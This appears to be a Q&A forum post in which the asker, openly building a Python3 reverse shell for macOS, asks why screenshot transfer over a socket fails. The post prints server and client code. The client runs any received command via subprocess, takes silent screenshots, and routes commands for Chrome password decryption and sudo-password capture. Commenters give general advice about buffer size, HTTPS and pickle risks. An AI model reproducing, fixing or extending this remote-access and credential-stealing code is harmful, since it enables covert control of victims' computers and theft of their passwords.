# Sending an image using sockets in Python3

Tags: python, image, sockets, tcp, data-transfer

Im working on a reverse shell project and I am using Python3. I am currently working on sending files over a socket connection but I can not for the love of good get it to work :( I have search the web and all google links are purple, so I am trying my luck here now.

Every time I try to send the file over I either get connection lost or the file just simply dose not transfer right.

I have tried different types of ways to get the image source over. The best attempts yet have been when I decode the image source into base64 and send them over but I think the problem has to do with the recv(1024).

Server.py

```
##################################
#            Server.py           #
##################################

#Connect with remote target client
def send_target_commands(conn):
    while True:
        try:
            cmd = input()
            if cmd == 'quit':
                break
            if len(str.encode(cmd)) > 0:
                conn.send(str.encode(cmd))
                client_respons = str(conn.recv(1024), "utf-8")

                #Custom commands requiering server based actions 
                if client_respons.startswith('osx_screen_shot') == True:
                    screen = client_respons[15:] #Delete 'osx_screen_shot ' fomr the string
                    f = open('temp.png', 'wb')
                    while screen != bytes(''.encode()):
                        #print(data)
                        data_d = str(conn.recv(1024))
                        f.write(data_d)
                else:
                    print(client_respons, end="")
        except:
            print("Connection was lost")
            break
```

Client.py

```
##################################
#            Client.py           #
##################################

#====== Screen Shoot ======#
def osx_screen_shot():
    os.system("export PATH=/bin:/usr/bin:/sbin:/usr/sbin")
    os.system("screencapture -x /tmp/temp")
    try:
        with open("/tmp/temp", 'rb') as hoosh:
            data = hoosh.read(1024)
            s.send(data)
            while data != bytes(''.encode()):
                #print(data)
                data = hoosh.read(1024)
                s.send(data)
            print(' File sent successfully.')

    except:
        return "Something went wrong"

#====== Listener =====#
while True:
    data = s.recv(1024)
    if data[:2].decode("utf-8") == 'cd':
        os.chdir(data[3:].decode("utf-8"))

    current_dir = "\033[1;31m[\033[0;97m"+str(os.getcwd())+"\033[1;31m]\033[0;97m"

    #Custom payload
    if len(data) > 0:
        if data == 'osx_menu':
            string = help_menu()
            s.send(str(string + current_dir) + ' ')
        elif data == 'osx_chrome_pass':
            passwords = function_chrome_decrypt()
            s.send(str(passwords + current_dir) + ' ')
        elif data[:2] == 'cd':
            s.send(str(current_dir) + ' ')
        elif data == 'osx_get_sudo_pass':
            string = get_sudo_password()
            s.send(str(string + current_dir) + ' ')
        elif data == 'osx_screen_shot':
            imgae_code = osx_screen_shot()
            s.send(str(imgae_code))
        elif data != '':
            cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            output_bytes = cmd.stdout.read() + cmd.stderr.read()
            output_str = str.decode(output_bytes)
            s.send(str(output_str + current_dir) + ' ')
```

What I except from the code is to be able to send the image source code over a socket and get the image on the server computer

Comment: You should use a known protocol to send data over instead of trying to craft your own. Something that support encryption like https. Then there's many ways to send data from the client to the server, the easiest way, but not the best way is probably to pickle your image object and send it over as a string you can then unpickle it on the server side. **Careful when you unpickle because its the equivalent of eval() and it can give code execution**

Comment: So can i compress a whole image with pickle into one string and then extract the file on the server?

Comment: Yes, but your issue here, like you pointed it out, is the size of your packet that is only 1024. Changing to use http or https should handle this and let you send any size you want. You can use the request library to do so.

Comment: I just answered a question about sending a file.  See https://stackoverflow.com/a/55840341/235698.